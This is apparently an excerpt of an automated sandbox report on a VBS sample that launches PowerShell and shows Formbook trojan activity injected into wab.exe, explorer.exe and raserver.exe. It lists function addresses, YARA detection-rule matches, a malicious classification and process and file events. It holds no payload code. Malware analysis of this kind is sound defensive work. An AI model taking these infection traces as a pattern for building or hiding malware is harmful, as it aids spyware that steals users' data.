        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224E757120_2_224E7571
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_2243053520_2_22430535
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224F059120_2_224F0591
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224CD5B020_2_224CD5B0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224EFA4920_2_224EFA49
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224E7A4620_2_224E7A46
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224A3A6C20_2_224A3A6C
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224DDAC620_2_224DDAC6
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_2242EA8020_2_2242EA80
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224CDAAC20_2_224CDAAC
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_22475AA020_2_22475AA0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224EAB4020_2_224EAB40
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224EFB7620_2_224EFB76
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224E6BD720_2_224E6BD7
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224A5BF020_2_224A5BF0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_2246DBF920_2_2246DBF9
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_2244FB8020_2_2244FB80
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_2243284020_2_22432840
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_2243A84020_2_2243A840
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_2249D80020_2_2249D800
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224338E020_2_224338E0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_2245E8F020_2_2245E8F0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224168B820_2_224168B8
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_2243995020_2_22439950
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_2244B95020_2_2244B950
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_2244696220_2_22446962
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224329A020_2_224329A0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224FA9A620_2_224FA9A6
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_22430E5920_2_22430E59
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224EEE2620_2_224EEE26
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224EEEDB20_2_224EEEDB
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_22442E9020_2_22442E90
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224ECE9320_2_224ECE93
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_22439EB020_2_22439EB0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224A4F4020_2_224A4F40
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224EFF0920_2_224EFF09
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_22472F2820_2_22472F28
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_22450F3020_2_22450F30
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_22422FC820_2_22422FC8
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_2243CFE020_2_2243CFE0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_22431F9220_2_22431F92
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224EFFB120_2_224EFFB1
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_22430C0020_2_22430C00
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224A9C3220_2_224A9C32
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_22420CF220_2_22420CF2
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224EFCF220_2_224EFCF2
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224D0CB520_2_224D0CB5
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_22433D4020_2_22433D40
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224E1D5A20_2_224E1D5A
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224E7D7320_2_224E7D73
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_2243AD0020_2_2243AD00
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_2244FDC020_2_2244FDC0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_2242ADE020_2_2242ADE0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_22448DBF20_2_22448DBF
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_2235A03620_2_2235A036
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_2235B23220_2_2235B232
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_22355B3020_2_22355B30
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_22355B3220_2_22355B32
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_2235108220_2_22351082
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_2235891220_2_22358912
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_22352D0220_2_22352D02
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_2235E5CD20_2_2235E5CD
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_2239A03620_2_2239A036
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_2239B23220_2_2239B232
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_22395B3020_2_22395B30
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_22395B3220_2_22395B32
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_2239108220_2_22391082
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_2239891220_2_22398912
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_22392D0220_2_22392D02
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_2239E5CD20_2_2239E5CD
        Source: C:\Windows\explorer.exeCode function: 22_2_0935091222_2_09350912
        Source: C:\Windows\explorer.exeCode function: 22_2_0934AD0222_2_0934AD02
        Source: C:\Windows\explorer.exeCode function: 22_2_093565CD22_2_093565CD
        Source: C:\Windows\explorer.exeCode function: 22_2_0935203622_2_09352036
        Source: C:\Windows\explorer.exeCode function: 22_2_0934908222_2_09349082
        Source: C:\Windows\explorer.exeCode function: 22_2_0934DB3022_2_0934DB30
        Source: C:\Windows\explorer.exeCode function: 22_2_0934DB3222_2_0934DB32
        Source: C:\Windows\explorer.exeCode function: 22_2_0935323222_2_09353232
        Source: C:\Windows\explorer.exeCode function: 22_2_09AFD5CD22_2_09AFD5CD
        Source: C:\Windows\explorer.exeCode function: 22_2_09AF1D0222_2_09AF1D02
        Source: C:\Windows\explorer.exeCode function: 22_2_09AF791222_2_09AF7912
        Source: C:\Windows\explorer.exeCode function: 22_2_09AF008222_2_09AF0082
        Source: C:\Windows\explorer.exeCode function: 22_2_09AF903622_2_09AF9036
        Source: C:\Windows\explorer.exeCode function: 22_2_09AF4B3222_2_09AF4B32
        Source: C:\Windows\explorer.exeCode function: 22_2_09AF4B3022_2_09AF4B30
        Source: C:\Windows\explorer.exeCode function: 22_2_09AFA23222_2_09AFA232
        Source: C:\Windows\explorer.exeCode function: 22_2_0B31323222_2_0B313232
        Source: C:\Windows\explorer.exeCode function: 22_2_0B30DB3022_2_0B30DB30
        Source: C:\Windows\explorer.exeCode function: 22_2_0B30DB3222_2_0B30DB32
        Source: C:\Windows\explorer.exeCode function: 22_2_0B31091222_2_0B310912
        Source: C:\Windows\explorer.exeCode function: 22_2_0B30AD0222_2_0B30AD02
        Source: C:\Windows\explorer.exeCode function: 22_2_0B3165CD22_2_0B3165CD
        Source: C:\Windows\explorer.exeCode function: 22_2_0B31203622_2_0B312036
        Source: C:\Windows\explorer.exeCode function: 22_2_0B30908222_2_0B309082
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 25_2_00C85F6425_2_00C85F64
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 25_2_0450244625_2_04502446
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 25_2_0444146025_2_04441460
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 25_2_0450F43F25_2_0450F43F
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 25_2_044FE4F625_2_044FE4F6
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 25_2_0450757125_2_04507571
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 25_2_0445053525_2_04450535
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 25_2_0451059125_2_04510591
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 25_2_044ED5B025_2_044ED5B0
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 25_2_045016CC25_2_045016CC
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 25_2_0446C6E025_2_0446C6E0
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 25_2_0447475025_2_04474750
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 25_2_0445077025_2_04450770
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 25_2_0444C7C025_2_0444C7C0
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 25_2_0450F7B025_2_0450F7B0
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 25_2_044FF0CC25_2_044FF0CC
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 25_2_044570C025_2_044570C0
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 25_2_0450F0E025_2_0450F0E0
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 25_2_045070E925_2_045070E9
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 25_2_044D815825_2_044D8158
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 25_2_0448516C25_2_0448516C
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 25_2_0443F17225_2_0443F172
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 25_2_0451B16B25_2_0451B16B
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 25_2_0444010025_2_04440100
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 25_2_044EA11825_2_044EA118
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 25_2_045081CC25_2_045081CC
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 25_2_0445B1B025_2_0445B1B0
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 25_2_045101AA25_2_045101AA
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 25_2_044F027425_2_044F0274
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 25_2_0446B2C025_2_0446B2C0
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 25_2_044D02C025_2_044D02C0
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 25_2_044F12ED25_2_044F12ED
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 25_2_044552A025_2_044552A0
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 25_2_0450A35225_2_0450A352
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 25_2_0443D34C25_2_0443D34C
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 25_2_0450132D25_2_0450132D
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 25_2_0445E3F025_2_0445E3F0
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 25_2_045103E625_2_045103E6
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 25_2_0449739A25_2_0449739A
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 25_2_04450C0025_2_04450C00
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 25_2_044C9C3225_2_044C9C32
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 25_2_0450FCF225_2_0450FCF2
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 25_2_04440CF225_2_04440CF2
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 25_2_044F0CB525_2_044F0CB5
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 25_2_04453D4025_2_04453D40
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 25_2_04501D5A25_2_04501D5A
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 25_2_04507D7325_2_04507D73
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 25_2_0445AD0025_2_0445AD00
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 25_2_0446FDC025_2_0446FDC0
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 25_2_0444ADE025_2_0444ADE0
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 25_2_04468DBF25_2_04468DBF
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 25_2_04450E5925_2_04450E59
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 25_2_0450EE2625_2_0450EE26
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 25_2_0450EEDB25_2_0450EEDB
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 25_2_0450CE9325_2_0450CE93
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 25_2_04462E9025_2_04462E90
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 25_2_04459EB025_2_04459EB0
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 25_2_044C4F4025_2_044C4F40
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 25_2_0450FF0925_2_0450FF09
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 25_2_04492F2825_2_04492F28
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 25_2_04470F3025_2_04470F30
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 25_2_04442FC825_2_04442FC8
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 25_2_0445CFE025_2_0445CFE0
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 25_2_04451F9225_2_04451F92
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 25_2_0450FFB125_2_0450FFB1
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 25_2_044CEFA025_2_044CEFA0
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 25_2_0445284025_2_04452840
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 25_2_0445A84025_2_0445A840
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 25_2_044BD80025_2_044BD800
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 25_2_044538E025_2_044538E0
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 25_2_0447E8F025_2_0447E8F0
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 25_2_044368B825_2_044368B8
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 25_2_0445995025_2_04459950
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 25_2_0446B95025_2_0446B950
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 25_2_0446696225_2_04466962
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 25_2_044529A025_2_044529A0
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 25_2_0451A9A625_2_0451A9A6
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 25_2_04507A4625_2_04507A46
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 25_2_0450FA4925_2_0450FA49
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 25_2_044C3A6C25_2_044C3A6C
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 25_2_044FDAC625_2_044FDAC6
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 25_2_0444EA8025_2_0444EA80
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 25_2_044EDAAC25_2_044EDAAC
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 25_2_04495AA025_2_04495AA0
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 25_2_0450AB4025_2_0450AB40
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 25_2_0450FB7625_2_0450FB76
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 25_2_04506BD725_2_04506BD7
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 25_2_0448DBF925_2_0448DBF9
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 25_2_044C5BF025_2_044C5BF0
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 25_2_0446FB8025_2_0446FB80
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 25_2_001EC42225_2_001EC422
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 25_2_001EE54325_2_001EE543
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 25_2_001ED5F925_2_001ED5F9
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 25_2_001ED8B125_2_001ED8B1
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 25_2_001D2D9025_2_001D2D90
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 25_2_001EEDC525_2_001EEDC5
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 25_2_001D9E5025_2_001D9E50
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 25_2_001D9E4C25_2_001D9E4C
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 25_2_001EDF5E25_2_001EDF5E
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 25_2_001D2FB025_2_001D2FB0
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 25_2_041BA03625_2_041BA036
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 25_2_041B2D0225_2_041B2D02
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 25_2_041BE5CD25_2_041BE5CD
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 25_2_041B108225_2_041B1082
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 25_2_041B891225_2_041B8912
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 25_2_041BB23225_2_041BB232
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 25_2_041B5B3225_2_041B5B32
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 25_2_041B5B3025_2_041B5B30
        Source: C:\Windows\SysWOW64\raserver.exeCode function: String function: 044BEA12 appears 86 times
        Source: C:\Windows\SysWOW64\raserver.exeCode function: String function: 044CF290 appears 105 times
        Source: C:\Windows\SysWOW64\raserver.exeCode function: String function: 04485130 appears 36 times
        Source: C:\Windows\SysWOW64\raserver.exeCode function: String function: 00C90FD2 appears 117 times
        Source: C:\Windows\SysWOW64\raserver.exeCode function: String function: 04497E54 appears 96 times
        Source: C:\Windows\SysWOW64\raserver.exeCode function: String function: 0443B970 appears 265 times
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 224AF290 appears 103 times
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 22465130 appears 36 times
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 22477E54 appears 96 times
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 2241B970 appears 265 times
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 2249EA12 appears 82 times
        Source: birectangular.vbsInitial sample: Strings found which are bigger than 50
        Source: amsi32_7748.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
        Source: 00000016.00000002.2539715422.000000000B32B000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_772cc62d os = windows, severity = x86, creation_date = 2022-05-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8343b5d02d74791ba2d5d52d19a759f761de2b5470d935000bc27ea6c0633f5, id = 772cc62d-345c-42d8-97ab-f67e447ddca4, last_modified = 2022-07-18
        Source: 00000014.00000002.1962937195.0000000000690000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000014.00000002.1962937195.0000000000690000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 00000014.00000002.1962937195.0000000000690000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 00000019.00000002.2523572570.00000000001D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000019.00000002.2523572570.00000000001D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 00000019.00000002.2523572570.00000000001D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 00000019.00000002.2527878142.00000000006D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000019.00000002.2527878142.00000000006D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 00000019.00000002.2527878142.00000000006D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 00000019.00000002.2528076589.0000000000700000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000019.00000002.2528076589.0000000000700000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 00000019.00000002.2528076589.0000000000700000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 00000014.00000002.1962975047.00000000006C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000014.00000002.1962975047.00000000006C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 00000014.00000002.1962975047.00000000006C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: Process Memory Space: powershell.exe PID: 7428, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
        Source: Process Memory Space: powershell.exe PID: 7748, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
        Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winVBS@539/14@3/2
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 25_2_00C8A010 CoCreateInstance,25_2_00C8A010
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 25_2_00C852BB __EH_prolog3_catch_GS,LoadLibraryExW,FindResourceExW,LoadResource,SizeofResource,MultiByteToWideChar,FreeLibrary,25_2_00C852BB
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Concordal6.UdsJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7444:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7436:120:WilError_03
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_in3jrmsk.4py.ps1Jump to behavior
        Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\birectangular.vbs"
        Source: C:\Windows\SysWOW64\raserver.exeCommand line argument: offerraupdate25_2_00C89AC5
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=7428
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=7748
        Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
        Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
